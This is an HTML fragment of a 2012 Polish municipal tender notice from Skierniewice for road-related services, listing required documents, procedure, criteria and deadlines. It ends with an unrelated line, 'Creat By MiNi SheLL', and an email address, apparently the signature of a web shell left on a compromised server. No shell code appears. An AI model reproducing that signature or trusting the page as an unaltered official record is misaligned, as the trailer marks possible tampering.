7. Wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również 	wykonywanych, usług w zakresie niezbędnym do wykazania spełniania warunku wiedzy i 	doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli 	okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, 	przedmiotu, dat wykonania                  i odbiorców - zgodnie z załącznikiem nr 7 wraz z 	dokumentami potwierdzającymi, że te  usługi zostały wykonane lub są wykonywane należycie; 
8. Pełnomocnictwo, o którym mowa w pkt.  11.3 .SIWZ,(jeśli jest wymagane)
9. W przypadku wykonawców występujących wspólnie na podstawie art. 23 ustawy do oferty należy 	dołączyć dokumenty:  
	- pełnomocnictwo do reprezentowania w postępowaniu o udzielenie zamówienia publicznego, o 	którym mowa w art. 23 ustawy,
	- dokumenty wymienione w punktach od 8.1.3 do 8.1.6 SIWZ muszą być złożone przez każdy podmiot,
10. Dowód wniesienia wadium.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza zmiany postanowień zawartej umowy w zakresie: przedłużenia terminu 	realizacji, terminów płatności. Zamawiający może wyrazić zgodę na zmianę postanowień umowy 	pod warunkiem, że zmiany te nie będą niekorzystne dla Zamawiającego lub (w przypadku zmiany terminu realizacji zadania) wynikać będą z okoliczności nieprzewidzianych i niezawinionych przez 	Wykonawcę (warunki pogodowe, odmienne od przyjętych w dokumentacji warunki terenowe, 	zwłoka lub odmowa w wydawaniu pozwoleń i uzgodnień przez odpowiednie urzędy, konieczność 	usunięcia błędów w dokumentacji projektowej). Zmiana postanowień umowy może być dokonana 	tylko poprzez zawarcie pisemnego aneksu pomiędzy stronami.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.um.skierniewice.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Skierniewice
ul. Rynek 1
96-100 Skierniewice
Wydział Dróg i Komunikacji pok. nr 12 przy ul. Floriana 9.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.01.2012 godzina 11:30, miejsce: Urząd Miasta Skierniewice
ul. Rynek 1
96-100 Skierniewice
sekretariat pok. 14.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com